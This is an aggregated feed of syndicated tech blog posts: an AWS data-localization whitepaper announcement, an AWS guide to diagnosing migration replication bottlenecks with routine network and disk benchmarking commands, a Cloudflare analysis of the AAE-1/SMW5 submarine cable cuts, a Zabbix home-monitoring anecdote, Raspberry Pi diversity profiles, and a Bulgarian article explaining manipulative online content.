Introducing a new AWS whitepaper: Does data localization cause more problems than it solves?

Post Syndicated from Jana Kay original https://aws.amazon.com/blogs/security/introducing-a-new-aws-whitepaper-does-data-localization-cause-more-problems-than-it-solves/

Amazon Web Services (AWS) recently released a new whitepaper, Does data localization cause more problems than it solves?, as part of the AWS Innovating Securely briefing series. The whitepaper draws on research from Emily Wu’s paper Sovereignty and Data Localization, published by Harvard University’s Belfer Center, and describes how countries can realize similar data localization objectives through AWS services without incurring the unintended effects highlighted by Wu.

Wu’s research analyzes the intent of data localization policies, and compares that to the reality of the policies’ effects, concluding that data localization policies are often counterproductive to their intended goals of data security, economic competitiveness, and protecting national values.

The new whitepaper explains how you can use the security capabilities of AWS to take advantage of up-to-date technology and help meet your data localization requirements while maintaining full control over the physical location where your data is stored.

AWS offers robust privacy and security services and features that let you implement your own controls. AWS applies lessons learned around the globe at the local level to improve protection against security events. As an AWS customer, after you pick a geographic location to store your data, the cloud infrastructure provides you with greater resiliency and availability than you can achieve with on-premises infrastructure. When you choose an AWS Region, you maintain full control over the physical location where your data is stored. AWS also provides you with resources through the AWS compliance program to help you understand the robust controls in place at AWS to maintain security and compliance in the cloud.

An important finding of Wu’s research is that localization constraints can deter innovation and hurt local economies because they limit which services are available, or increase costs because there are a smaller number of service providers to choose from. Wu concludes that data localization can “raise the barriers [to entrepreneurs] for market entry, which suppresses entrepreneurial activity and reduces the ability for an economy to compete globally.” Data localization policies are especially challenging for companies that trade across national borders. International trade used to be the remit of only big corporations. Current data-driven efficiencies in shipping and logistics mean that international trade is open to companies of all sizes. There has been particular growth for small and medium enterprises involved in services trade (of which cross-border data flows are a key element). In a 2016 worldwide survey conducted by McKinsey, 86 percent of tech-based startups had at least one cross-border activity. The same report showed that cross-border data flows added some US$2.8 trillion to world GDP in 2014.

However, the availability of cloud services supports secure and efficient cross-border data flows, which in turn can contribute to national economic competitiveness. Deloitte Consulting’s report, The cloud imperative: Asia Pacific’s unmissable opportunity, estimates that by 2024, the cloud will contribute $260 billion to GDP across eight regional markets, with more benefit possible in the future. The World Trade Organization’s World Trade Report 2018 estimates that digital technologies, which includes advanced cloud services, will account for a 34 percent increase in global trade by 2030.

Wu also cites a link between national data governance policies and governments’ concerns that the movement of data outside national borders can diminish their control. However, the technology, storage capacity, and compute power provided by hyperscale cloud service providers like AWS can empower local entrepreneurs.

AWS continually updates practices to meet the evolving needs and expectations of both customers and regulators. This allows AWS customers to use effective tools for processing data, which can help them meet stringent local standards to protect national values and citizens’ rights.

Wu’s research concludes that “data localization is proving ineffective” for meeting intended national goals, and offers practical alternatives for policymakers to consider. Wu has several recommendations, such as continuing to invest in cybersecurity, supporting industry-led initiatives to develop shared standards and protocols, and promoting international cooperation around privacy and innovation. Despite the continued existence of data localization policies, countries can currently realize similar objectives through cloud services. AWS implements rigorous contractual, technical, and organizational measures to protect the confidentiality, integrity, and availability of customer data, regardless of which AWS Region you select to store your data. This means that, as an AWS customer, you can take advantage of the economic benefits and the support for innovation provided by cloud computing, while improving your ability to meet your core security and compliance requirements.

For more information, see the whitepaper Does data localization cause more problems than it solves?, or contact AWS.

If you have feedback about this post, submit comments in the Comments section below.

Authors

Jana Kay

Since 2018, Jana Kay has been a cloud security strategist with the AWS Security Growth Strategies team. She develops innovative ways to help AWS customers achieve their objectives, such as security tabletop exercises and other strategic initiatives. Previously, she was a cyber, counter-terrorism, and Middle East expert for 16 years in the Pentagon’s Office of the Secretary of Defense.

Arturo Cabanas

Arturo joined Amazon in 2017 and is AWS Security Assurance Principal for the Public Sector in Latin America, Canada, and the Caribbean. In this role, Arturo creates programs that help governments move their workloads and regulated data to the cloud by meeting their specific security, data privacy regulation, and compliance requirements.

Identification of replication bottlenecks when using AWS Application Migration Service

Post Syndicated from Tobias Reekers original https://aws.amazon.com/blogs/architecture/identification-of-replication-bottlenecks-when-using-aws-application-migration-service/

Enterprises frequently begin their cloud journey by re-hosting (lift-and-shift) their on-premises workloads on AWS, running them on Amazon Elastic Compute Cloud (Amazon EC2) instances. A simpler way to re-host is by using AWS Application Migration Service (Application Migration Service), a cloud-native migration service.

To streamline and expedite migrations, Application Migration Service automates reusable migration patterns that work for a wide range of applications, and it is the recommended service for lift-and-shift migrations to AWS.

In this blog post, we explore key variables that contribute to server replication speed when using Application Migration Service. We will also look at tests you can run to identify these bottlenecks and, where appropriate, include remediation steps.

Overview of migration using Application Migration Service

Figure 1 depicts the end-to-end data replication flow from source servers to a target machine hosted on AWS. The diagram is designed to help visualize potential bottlenecks within the data flow, which are denoted by a black diamond.

Figure 1. Data flow when using AWS Application Migration Service (black diamonds denote potential points of contention)

Baseline testing

To determine a baseline replication speed, we recommend performing a control test between your target AWS Region and the nearest Region to your source workloads. For example, if your source workloads are in a data center in Rome and your target Region is Paris, run a test between eu-south-1 (Milan) and eu-west-3 (Paris). This will give a theoretical upper bandwidth limit, as replication will occur over the AWS backbone. If the target Region is already the closest Region to your source workloads, run the test from within the same Region.
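
As a rough illustration of such a control test (a sketch only, not part of the original guidance; the Regions, instance IP, and package commands below are assumptions), you could launch a small EC2 instance in each of the two Regions and measure throughput between them with iperf3:

# On the instance in the Region nearest your source workloads (e.g., eu-south-1):
sudo yum install -y iperf3            # or use your distribution's package manager
iperf3 -s                             # listen in server mode on TCP port 5201 (allow it in the security group)

# On the instance in the target Region (e.g., eu-west-3), pointing at the first instance's IP:
sudo yum install -y iperf3
iperf3 -c 203.0.113.10 -P 8 -t 60     # 8 parallel streams for 60 seconds to approximate sustained throughput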

Network connectivity

There are several ways to establish connectivity between your on-premises location and an AWS Region:

  1. Public internet
  2. VPN
  3. AWS Direct Connect

This section pertains to options 1 and 2. If facing replication speed issues, the first place to look is at network bandwidth. From a source machine within your internal network, run a speed test to calculate your bandwidth out to the internet; common test providers include Cloudflare, Ookla, and Google. This is your bandwidth to the internet, not to AWS.

Next, to confirm the data flow from within your data center, run a tracert (Windows) or traceroute (Linux). Identify any network hops that are unusual or potentially throttling bandwidth (due to hardware limitations or configuration).
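
For example (the endpoint below is only an illustrative AWS hostname; substitute the address relevant to your replication subnet):

# Windows (-d skips resolving addresses to hostnames)
tracert -d s3.eu-west-3.amazonaws.com

# Linux (-n skips reverse DNS lookups so hops are easier to read)
traceroute -n s3.eu-west-3.amazonaws.com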

To measure the maximum bandwidth between your data center and the AWS subnet that is being used for data replication, while accounting for Secure Sockets Layer (SSL) encapsulation, use the CloudEndure SSL bandwidth tool (refer to Figure 1).

Source storage I/O

The next area to look for replication bottlenecks is source storage. The underlying storage of the source servers can be a point of contention: if it is maxing out its read speeds, or if its I/O is otherwise heavily utilized, block replication by Application Migration Service will slow down. To measure storage speeds, you can use the following tools:

  • Windows: WinSat (or other third-party tooling, like AS SSD Benchmark)
  • Linux: hdparm

We suggest reducing read/write operations on your source storage when starting your migration using Application Migration Service.
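
As a quick illustration of running the tools above (the drive letter and device name are placeholders; adjust them for your servers):

# Windows (elevated command prompt): benchmark disk performance for drive C:
winsat disk -drive c

# Linux: measure cached (-T) and buffered, direct-from-disk (-t) read speeds for /dev/sda
sudo hdparm -tT /dev/sda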

Application Migration Service EC2 replication instance size

The size of the EC2 replication server instance can also have an impact on the replication speed. Although it is recommended to keep the default instance size (t3.small), it can be increased if there are business requirements, for example, to speed up the initial data sync. Note: using a larger instance can lead to increased compute costs.


Common replication instance changes include:

  • Servers with fewer than 26 disks: change the instance type to m5.large. Increase the instance type to m5.xlarge or higher, as needed.
  • Servers with 26 or more disks (or servers in AWS Regions that do not support m5 instance types): change the instance type to m4.large. Increase to m4.xlarge or higher, as needed.

Note: Changing the replication server instance type will not affect data replication. Data replication will automatically pick up where it left off, using the new instance type you selected.
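
If you prefer the AWS CLI over the console, the change can be sketched roughly as follows (a hedged example: the IDs are placeholders, and the exact parameter names should be verified against the current aws mgn reference):

# Change the replication server instance type for a single source server
aws mgn update-replication-configuration \
  --source-server-id s-1234567890abcdef0 \
  --replication-server-instance-type m5.large

# Or change the default for newly added source servers via the replication template
aws mgn update-replication-configuration-template \
  --replication-configuration-template-id rct-1234567890abcdef0 \
  --replication-server-instance-type m5.large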

Application Migration Service Elastic Block Store replication volume

You can customize the Amazon Elastic Block Store (Amazon EBS) volume type used by each disk within each source server in that source server’s settings (change staging disk type).

By default, disks smaller than 500 GiB use Magnetic HDD volumes. AWS best practice suggests not changing the default Amazon EBS volume type unless there is a business need for doing so. However, because we aim to speed up the replication, we actively change the default EBS volume type.

There are two options to choose from:

  1. The lower-cost Throughput Optimized HDD (st1) option utilizes slower, less expensive disks.

     Consider this option if you:
       • Want to keep costs low
       • Have large disks that do not change frequently
       • Are not concerned with how long the initial sync process will take

  2. The faster General Purpose SSD (gp2) option utilizes faster, but more expensive, disks.

     Consider this option if you:
       • Have source servers with disks that have a high write rate, or need faster performance in general
       • Want to speed up the initial sync process
       • Are willing to pay more for speed
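
The staging disk type can also be changed per replicated disk from the CLI. The sketch below is illustrative only; the server ID, device name, and shorthand syntax are assumptions to verify against the aws mgn documentation before use:

# Switch the staging disk for /dev/sda on one source server from the default to gp2
# (check how the command treats disks you omit before running it against production servers)
aws mgn update-replication-configuration \
  --source-server-id s-1234567890abcdef0 \
  --replicated-disks deviceName=/dev/sda,stagingDiskType=GP2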

Source server CPU

The Application Migration Service agent that is installed on the source machine for data replication uses a single core in most cases (agent threads can be scheduled to multiple cores). If core utilization reaches a maximum, this can be a limitation for replication speed. In order to check the core utilization:

  • Windows: Launch the Task Manager application within Windows, and click on the “CPU” tab. Right-click on the CPU graph (which by default shows an average of all cores), select “Change graph to” > “Logical processors”. This will show individual cores and their current utilization (Figure 2).

Figure 2. Logical processor CPU utilization

  • Linux: Install htop and run it from the terminal. The htop output will display the Application Migration Service/CE process and indicate its CPU and memory utilization percentage (relative to the entire machine). You can check the CPU bars to determine whether a core is being maxed out (Figure 3).

Figure 3. AWS Application Migration Service/CE process to assess CPU utilization
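
On Linux you can also get a quick per-core view without htop's interactive UI, for example with mpstat from the sysstat package (a generic illustration, not specific to the Application Migration Service agent):

# Print utilization for every logical CPU: 5-second samples, 3 iterations
mpstat -P ALL 5 3

# Or list the top CPU-consuming processes once, in batch mode
top -b -n 1 | head -n 20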

Conclusion

In this post, we explored several key variables that contribute to server replication speed when using Application Migration Service. We encourage you to explore these key areas during your migration to determine if your replication speed can be optimized.

Related information

[VIDEO] An Inside Look at the RSA 2022 Experience From the Rapid7 Team​

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2022/06/10/video-an-inside-look-at-the-rsa-2022-experience-from-the-rapid7-team/


The two years since the last RSA Conference have been pretty uneventful. Sure, COVID-19 sent us all to work from home for a little while, but it’s not as though we’ve seen any supply-chain-shattering breaches, headline-grabbing ransomware attacks, internet-inferno vulnerabilities, or anything like that. We’ve mostly just been baking sourdough bread and doing woodworking in between Zoom meetings.

OK, just kidding on basically all of that (although I, for one, have continued to hone my sourdough game). ​

The reality has been quite the opposite. Whether it’s because an unprecedented number of crazy things have happened since March 2020 or because pandemic-era uncertainty has made all of our experiences feel a little more heightened, the past 24 months have been a lot. And now that restrictions on gatherings are largely lifted in most places, many of us are feeling like we need a chance to get together and debrief on what we’ve all been through.

Given that context, what better timing could there have been for RSAC 2022? This past week, a crew of Rapid7 team members gathered in San Francisco to sync up with the greater cybersecurity community and take stock of how we can all stay ahead of attackers and ready for the future in the months to come. We asked four of them — Jeffrey Gardner, Practice Advisor – Detection & Response; Tod Beardsley, Director of Research; Kelly Allen, Social Media Manager; and Erick Galinkin, Principal Artificial Intelligence Researcher — to tell us a little bit about their RSAC 2022 experience. Here’s a look at what they had to say — and a glimpse into the excitement and energy of this year’s RSA Conference.

What’s it been like returning to full-scale in-person events after 2 years?



[Video]

What was your favorite session or speaker of the week? What made them stand out?



[Video]

What was your biggest takeaway from the conference? How will it shape the way you think about and practice cybersecurity in the months to come?



[Video]

Want to relive the RSA experience for yourself? Check out our replays of Rapid7 speakers’ sessions from the week.

Additional reading:


[$] Vetting the cargo

Post Syndicated from original https://lwn.net/Articles/897435/

Modern language environments make it easy to discover and incorporate externally written libraries into a program. These same mechanisms can also make it easy to inadvertently incorporate security vulnerabilities or overtly malicious code, which is rather less gratifying. The stream of resulting vulnerabilities seems like it will never end, and it afflicts relatively safe languages like Rust just as much as any other language. In an effort to avoid the embarrassment that comes with shipping vulnerabilities (or worse) by way of its dependencies, the Mozilla project has come up with a new supply-chain management tool known as "cargo vet".
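
For readers unfamiliar with the tool, a typical workflow looks roughly like the following (a sketch based on cargo vet's documented subcommands; the crate name and version are only examples):

cargo install cargo-vet          # install the tool from crates.io
cargo vet init                   # create the audit metadata, exempting existing dependencies
cargo vet                        # fail if any dependency is neither audited nor exempted
cargo vet certify serde 1.0.137  # record that you have audited a specific crate version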

I belong in computer science

Post Syndicated from Janina Ander original https://www.raspberrypi.org/blog/i-belong-in-computer-science-isaac-computer-science/

At the Raspberry Pi Foundation, we believe everyone belongs in computer science, and that it is a much more varied field than is commonly assumed. One of the ways we want to promote inclusivity and highlight the variety of skills and interests needed in computer science is through our ‘I belong’ campaign. We do this because the tech sector lacks diversity. Similarly, in schools, there is underrepresentation of students in computing along the axes of gender, ethnicity, and economic situation. (See how researchers describe data from England, and data from the USA.)

Woman teacher and female students at a computer

The ‘I belong’ campaign is part of our work on Isaac Computer Science, our free online learning platform for GCSE and A level students (ages 14 to 18) and their teachers, funded by the Department for Education. The campaign celebrates young computer scientists and how they came to love the subject, what their career journey has been so far, and what their thoughts are about inclusivity and belonging in their chosen field.

These people are role models who demonstrate that everyone belongs in computer science, and that everyone can bring their interests and skills to bear in the field. In this way, we want to show young people that they can do much more with computing than they might think, and to inspire them to consider how computing could be part of their own life and career path.

Meet Salome

Salome is studying Computer Science with Digital Technology Solutions at the University of Leeds and doing a degree apprenticeship with PricewaterhouseCoopers (PwC).

Salome smiling. The text says I belong in computer science.

“I was quite lucky, as growing up I saw a lot about women in STEM which inspired me to take this path. I think to improve the online community, we need to keep challenging stereotypes and getting more and more people to join, thereby improving the diversity. This way, a larger number of people can have role models and identify themselves with someone currently there.”

“Another thing is the assumption that computer science is just coding and not a wide and diverse field. I still have to explain to my friends what computer science involves and can become, and then they will say, ‘Wow, that’s really interesting, I didn’t know that.’”

Meet Devyani

Devyani is a third-year degree apprentice at Cisco. 

Devyani smiling. The text says I belong in computer science.

“It was at A level where I developed my programming skills, and it was more practical rather than theoretical. I managed to complete a programming project where I utilised PHP, JavaScript, and phpMyAdmin (which is a database). It was after this that I started looking around and applying for degree apprenticeships. I thought that university wasn’t for me, because I wanted a more practical and hands-on approach, as I learn better that way.”

“At the moment, I’m currently doing a product owner role, which is where I hope to graduate into. It’s a mix between both a business role and a technical role. I have to stay up to speed with the current technologies we are using and developing for our clients and customers, but also I have to understand business needs and ensure that the team is able to develop and deliver on time to meet those needs.”

Meet Omar

Omar is a Mexican palaeontologist who uses computer science to study dinosaur bones.

Omar. The text says I belong in computer science.

“I try to bring aspects that are very well developed in computer science and apply them in palaeontology. For instance, when digitising the vertebrae, I use a lot of information theory. I also use a lot of data science and integrity to make sure that what we have captured is comparable with what other people have found.”

“What drove me to computers was the fact you are always learning. That’s what keeps me interested in science: that I can keep growing, learn from others, and I can teach people. That’s the other thing that makes me feel like I belong, which is when I am able to communicate the things I know to someone else and I can see the face of the other person when they start to grasp a theory.”

Meet Tasnima

Tasnima is a computer science graduate from Queen Mary University of London, and is currently working as a software engineer at Credit Suisse.

Tasnima smiling. The text says I belong in computer science.

“During the pandemic, one of the good things to come out of it is that I could work from home, and that means working with people all over the world, bringing together every race, religion, gender, etc. Even though we are all very different, the one thing we all have in common is that we’re passionate about technology and computer science. Another thing is being able to work in technology in the real world. It has allowed me to work in an environment that is highly collaborative. I always feel like you’re involved from the get-go.”

“I think we need to also break the image that computer science is all about coding. I’ve had friends that have stayed away from any tech jobs because they think that they don’t want to code, but there’s so many other roles within technology and jobs that actually require no coding whatsoever.”

Meet Aleena

Aleena is a software engineer who works at a health tech startup in London and is also studying for a master’s degree in AI ethics at the University of Cambridge.

Aleena smiling. The text says I belong in computer science.

“I do quite a lot of different things as an engineer. It’s not just coding, which is part of it but it is a relatively small percentage, compared to a lot of other things. […] There’s a lot of collaborative time and I would say a quarter or third of the week is me by myself writing code. The other time is spent collaborating and working with other people and making sure that we’re all aligned on what we are working on.”

“I think it’s actually a very diverse field of tech to work in, once you actually end up in the industry. When studying STEM subjects at a college or university level it is often not very diverse. The industry is the opposite. A lot of people come from self-taught or bootcamp backgrounds, there’s a lot of ways to get into tech and software engineering, and I really like that aspect of it. Computer science isn’t the only way to go about it.”

Meet Alice

Alice is a final-year undergraduate student of Computer Science with Artificial Intelligence at the University of Brighton. She is also the winner of the Global Challenges COVID-19 Research Scholarship offered by Santander Universities.

Alice wearing a mask over her face and mouth. The text says I belong in computer science.

“[W]e need to advertise computer science as more than just a room full of computers, and to advertise computer sciences as highly collaborative. It’s very creative. If you’re on a team of developers, there’s a lot of communication involved.”

“There’s something about computer science that I think is so special: the fact that it is a skill anybody can learn, regardless of who they are. With the right idea, anybody can build anything.”

Share these stories to inspire

Help us spread the message that everyone belongs in computer science: share this blog with schools, teachers, STEM clubs, parents, and young people you want to inspire.

You can learn computer science with us

Whether you’re studying or teaching computer science GCSE or A levels in the UK (or thinking about doing so!), or you’re a teacher or student in another part of the world, Isaac Computer Science is here to help you achieve your computer science goals. Our high-quality learning platform is free to use and open to all. As a student, you can register to keep track of your progress. As a teacher, you can sign up to guide your students’ learning.

Two teenage boys do coding at a shared computer during a computer science lesson while their woman teacher observes them.

And for younger learners, we have lots of fun project guides to try out coding and creating with digital technologies.

Three teenage girls at a laptop

The post I belong in computer science appeared first on Raspberry Pi.

AAE-1 & SMW5 cable cuts impact millions of users across multiple countries

Post Syndicated from David Belson original https://blog.cloudflare.com/aae-1-smw5-cable-cuts/


Just after 1200 UTC on Tuesday, June 7, the Africa-Asia-Europe-1 (AAE-1) and SEA-ME-WE-5 (SMW-5) submarine cables suffered cable cuts. The damage reportedly occurred in Egypt, and impacted Internet connectivity for millions of Internet users across multiple countries in the Middle East and Africa, as well as thousands of miles away in Asia. In addition, Google Cloud Platform and OVHcloud reported connectivity issues due to these cable cuts.

The impact

Data from Cloudflare Radar showed significant drops in traffic across the impacted countries as the cable damage occurred, recovering approximately four hours later as the cables were repaired.

[Cloudflare Radar traffic graphs for the impacted countries]

It appears that Saudi Arabia may have also been affected by the cable cut(s), but the impact was much less significant, and traffic recovered almost immediately.

[Cloudflare Radar traffic graph for Saudi Arabia]

In the graphs above, we show that Ethiopia was one of the impacted countries. However, as it is landlocked, it obviously has no submarine cable landing points within the country. The Afterfibre map from the Network Startup Resource Center (NSRC) shows that the fiber in Ethiopia connects to fiber in Somalia, which experienced an impact. Ethio Telecom also routes traffic through network providers in Kenya and Djibouti. Djibouti Telecom, one of these providers, in turn peers with larger global providers like Telecom Italia (TI) Sparkle, which is one of the owners of SMW5.

In addition to impacting end-user connectivity in the impacted countries, the cable cuts also reportedly impacted cloud providers including Google Cloud Platform and OVHcloud. In their incident report, Google Cloud noted “Google Cloud Networking experienced increased packet loss for egress traffic from Google to the Middle East, and elevated latency between our Europe and Asia Regions as a result, for 3 hours and 12 minutes, affecting several related products including Cloud NAT, Hybrid Connectivity and Virtual Private Cloud (VPC). From preliminary analysis, the root cause of the issue was a capacity shortage following two simultaneous fiber-cuts.” OVHcloud noted that “Backbone links between Marseille and Singapore are currently down” and that “Upon further investigation, our Network OPERATION teams advised that the fault was related to our partner fiber cuts.”

When concurrent disruptions like those highlighted above are observed across multiple countries in one or more geographic areas, the culprit is often a submarine cable that connects the impacted countries to the global Internet. The impact of such cable cuts will vary across countries, largely due to the levels of redundancy that they may have in place. That is, are these countries solely dependent on an impacted cable for global Internet connectivity, or do they have redundant connectivity across other submarine or terrestrial cables? Additionally, the location of the country relative to the cable cut will also impact how connectivity in a given country may be affected. Due to these factors, we didn’t see a similar impact across all of the countries connected to the AAE-1 and SMW5 cables.

What happened?

Specific details are sparse, but as noted above, the cable damage reportedly occurred in Egypt – both of the impacted cables land in Abu Talat and Zafarana, which also serve as landing points for a number of other submarine cables. According to a 2021 article in Middle East Eye, “There are 10 cable landing stations on Egypt’s Mediterranean and Red Sea coastlines, and some 15 terrestrial crossing routes across the country.” Alan Mauldin, research director at telecommunications research firm TeleGeography, notes that routing cables between Europe and the Middle East to India is done via Egypt, because there is the least amount of land to cross. This places the country in a unique position as a choke point for international Internet connectivity, with damage to infrastructure locally impacting the ability of millions of people thousands of miles away to access websites and applications, as well as impacting connectivity for leading cloud platform providers.

As the graphs above show, traffic returned to normal levels within a matter of hours, with tweets from telecommunications authorities in Pakistan and Oman also noting that Internet services had returned to their countries. Such rapid repairs to submarine cable infrastructure are unusual, as repair timeframes are often measured in days or weeks, as we saw with the cables damaged by the volcanic eruption in Tonga earlier this year. This is due to the need to locate the fault, send repair ships to the appropriate location, and then retrieve the cable and repair it. Given this, the damage to these cables likely occurred on land, after they came ashore.

Keeping content available

By deploying in data centers close to end users, Cloudflare helps to keep traffic local, which can mitigate the impact of catastrophic events like cable cuts, while improving performance, availability, and security. Being able to deliver content from our network generally requires first retrieving it from an origin, and with end users around the world, Cloudflare needs to be able to reach origins from multiple points around the world at the same time. However, a customer origin may be reachable from some networks but not from others, due to a cable cut or some other network disruption.

In September 2021, Cloudflare announced Orpheus, which provides reachability benefits for customers by finding unreachable paths on the Internet in real time, and guiding traffic away from those paths, ensuring that Cloudflare will always be able to reach an origin no matter what is happening on the Internet.

Conclusion

Because the Internet is an interconnected network of networks, an event such as a cable cut can have a ripple effect across the whole Internet, impacting connectivity for users thousands of miles away from where the incident occurred. Users may be unable to access content or applications, or the content/applications may suffer from reduced performance. Additionally, the providers of those applications may experience problems within their own network infrastructure due to such an event.

For network providers, the impact of such events can be mitigated through the use of multiple upstream providers/peers, and diverse physical paths for critical infrastructure like submarine cables. Cloudflare’s globally deployed network can help content and application providers ensure that their content and applications remain available and performant in the face of network disruptions.

What’s Up, Home? – Don’t Forget the Facial Cream

Post Syndicated from Janne Pikkarainen original https://blog.zabbix.com/whats-up-home-dont-forget-the-facial-cream/21063/

Can you monitor the regular use of facial cream with Zabbix? Of course, you can! Here’s how. This same method could be very useful for monitoring if the elderly remember to take their meds or so.

What the heck?

A little background story. My forehead has a tendency for dry skin, so I should be using facial cream daily. Of course, as a man, I can guarantee you that 100% of the days I remember to use the cream, I apply it, so in practice, this means about 40-50% hit ratio.

As lately I have been adding more monitored targets to my home Zabbix, one night my wife, probably thinking she was being snarky or funny, said, “One monitor I could happily receive data about would be how often you remember to use your facial cream.”

A monitoring nerd does not take such ideas lightly.

Howdy door sensor, would you like to do some work?

I found a spare magnetic door sensor and a handy box in which to store the cream.

You can see where this is going. This totally beautiful prototype of my Facial Cream Smart Storage Box is now deployed for testing. If I open or close the box, the door sensor status changes, and the facial cream mercy countdown timer resets.

How does it work? And does it really work?

The Cozify smart IoT hub is keeping an eye on the magnetic door sensor’s last status change. And look, that awesome brown tape does not bother the magnets at all: Cozify reported the status as changed.

Now that I have the Cozify part working, my Zabbix can receive the last change time as Unix time.

On my Grafana dashboard, there’s now this absolutely gorgeous new panel, converting the Unix time into a “How long ago did the last event happen?” indicator.

So the dashboard part is now working. But that is not all we need to do.

Alerting and escalation

Dashboards and monitoring are not useful at all if proper alerts are not being sent out. I now have this new alert trigger action rule in place.

In other words, if I forget to apply the facial cream, I have a one-hour window to apply it; otherwise, the alert gets escalated to my wife.

Will this method work? Is my prototype box reliable? I will tell you next time.

I have been working at Forcepoint since 2014 and never get tired of finding out new areas to monitor. — Janne Pikkarainen

The post What’s Up, Home? – Don’t Forget the Facial Cream appeared first on Zabbix Blog.

What is manipulative content?

Post Syndicated from Йоанна Елми original https://toest.bg/kakvo-e-manipulativno-sudurzhanie/

Over the past two years we have witnessed an infodemic tied to the COVID-19 pandemic. The infodemic continues today, but its focus has shifted to the war in Ukraine.

What does manipulative content consist of?

Manipulative content may include false claims, or it may be based on accurate information that has been taken out of context or distorted to fit a particular thesis. Manipulative content is often described with the abbreviation MDM: misinformation, disinformation, and malinformation.

Disinformation is entirely false information that is usually spread deliberately, sometimes in a coordinated way, with the aim of misleading the audience. One example is a claim on the website The Bulgarian Times that numerous laboratories have established that the coronavirus does not exist. The cited source is an American website devoted to campaigning against fluoride, whose original article contains a scanned document from a standard laboratory procedure with sporadic underlining whose connection to the argument is unclear. The Bulgarian site, known for systematically spreading false information, cites the story as confirmation from 187 laboratories that the coronavirus does not exist. There is no truth to the claim whatsoever.

What is more, the original article claims that scientific laboratories are hiding the truth, i.e. lying, while the Bulgarian article uses them for legitimizing purposes, i.e. as support for the argument that the coronavirus does not exist, in complete contradiction with the original it cites. Internal contradictions are a frequent signal of manipulated information. In addition, when data are not explicitly explained but many numbers, names, and institutions are simply cited, the goal is often to confuse the reader, which helps create a particular impression, since the logical sequence between the events and the presented data is lost.

Misinformation is also untrue, but it is not spread intentionally; misinformation often begins as disinformation that is then shared by unsuspecting users. Unlike the first two types, which involve lies, malinformation is based on the truth but is used to harm someone: a person, an organization, a country. Such information may be accurate but have its context withheld, or certain events may be deliberately misinterpreted. In fact, the majority of false information is of this kind, rather than outright lies.

We find an example on the same website, where legitimate data from a report by the UK Health Security Agency is quoted incorrectly and interpreted misleadingly. First, the site's article claims that these are "raw data", without defining what that means; the data in the report are processed and presented in tables with the necessary statistical intervals and explanations for reading the results. The article states that "a total of 1,086,434 cases of COVID-19 were registered among vaccinated people, which represents 73% of all cases during this period." This, however, is incomplete information and creates a false impression: the report explicitly notes the effectiveness of the vaccines in preventing hospitalization, severe illness, and death.

The article also omits the key note on interpreting the data: in a population with very high vaccination coverage, it is entirely normal for a high percentage of the infected to be vaccinated, simply because the majority of people are vaccinated. The question is how many of them develop severe disease; a fatal outcome remains many times more likely among the unvaccinated, which is missing from the article. Instead, a mass of jumbled data from various places is served up, again with the aim of confusing the reader. Within a few days the article was shared in numerous Facebook groups.

A large part of contemporary propaganda is precisely malinformation. Propaganda differs from the concepts above in that the information is spread by an interested party that aims to paint its opponent in an extremely negative light and to cultivate particular ideas and doctrines. Propaganda may be state, party, or other propaganda, and it often employs every kind of manipulative content.

Information pollution

To begin with, the abundance of manipulative content, in other words information pollution, is helped by the fact that much of the news content online is free and easy to digest. Many websites live off advertising revenue: their goal is to keep the user on the page as long as possible, which is often achieved by publishing sensationalist and extremist content that is simple and does not bore. There are, of course, also sites that are instruments of propaganda and part of coordinated disinformation campaigns. False information online is also more accessible than accurate information, which is often more complex and requires more effort to create, verify, correct, and make sense of.

Manipulative information relies chiefly on social networks, where any user can amplify the spread of content that does not necessarily meet professional standards. In addition, social networks privilege emotion over reason, and manipulative content plays on precisely those psychological and emotional levers. Journalists, too, can play a role in creating and spreading false information when they lack high professional standards or carry heavy political dependencies and prejudices, which, unfortunately, is not a rare case in Bulgaria.

It is also not enough simply to point out that a given outlet or author is unreliable; arguments are needed as to why. This, however, is one of the paradoxes of false information: there is far more of it than accurate information, and debunking every untruth is difficult and time-consuming, a resource journalists simply do not have. State regulation of the media, in turn, is complicated and hard to achieve if we want to avoid censorship. For now, the solution remains in the hands of the media consumer, who must learn to recognize manipulation. Otherwise, false information achieves its greatest goal: the audience stops believing any information, including good journalism, which is ruinous for democracy and freedom.

Names matter

If the absence of an author, opaque ownership of the outlet, and screaming headlines should set off a warning light, that is not always quite enough to be sure we are reading manipulative information. A basic rule is that when an article is signed by a journalist and the outlet has transparent ownership, a code of ethics, and a correspondence address, this provides better accountability for the quality of the information and gives the reader a way to contact the newsroom and the journalist in case of errors.

The authors and sources of a given piece of information matter enormously. One of the main spreaders of false information at the height of the pandemic, Ventsislav Angelov, known as Chicagoto, to whom we owe the false claim that "airplanes are spraying coronavirus", is today linked to the huge banner in front of the government building declaring that "the war in Ukraine is the true face of global Satanism", toward which Bulgaria must maintain "complete neutrality". Chicagoto's videos are shared in dozens of Facebook groups by a profile under the name Anton Zhelyazkov. He, in turn, systematically shares articles from the website vsekidenbg.eu, whose first publications date from the end of April this year and carry pointedly anti-government and pro-Russian content.

On the contact page of vsekidenbg.eu we find boilerplate content, non-working email addresses and phone numbers, and a listed location in the state of Utah, USA. That did not stop an article from the site, in which Putin promises to punish those responsible for the pandemic, from being shared in a pro-Russian Facebook group and generating 45 comments and 66 subsequent shares in less than a day. A week later the content was being spread by numerous users online, whether in earnest, in condemnation, or with satirical commentary. The site also publishes photographs and videos without indicating whether this content has gone through the checks of origin and facts that professional journalists routinely perform.

Another example of the importance of sources is the Facebook group BROD, which has more than 18,000 members and whose timeline traces a clearly marked disinformation trajectory: from the Strategy for the Child, through anti-COVID content, to today's extremely pro-Russian and anti-Ukrainian material. In this case it is not clear which came first, the chicken or the egg, since it is entirely possible that BROD's users get their information from the same sources, which flow from one disinformation line into another. That would make it disinformation or malinformation that has turned into misinformation.

Political polarization

The problem of addressing manipulative content is made worse by growing political polarization. It is further complicated by the empirically documented fact that certain political parties and ideologues systematically rely more heavily on disinformation. Debunking a given thesis can thus be perceived as a direct attack on a person's political allegiances, provoking very strong reactivity and resistance to the debunking, and so the vicious circle closes. Misconceptions tied to political allegiance are the least amenable to change, because people find it hard to re-evaluate views they have already formed. Those who deal in disinformation count on exactly that.

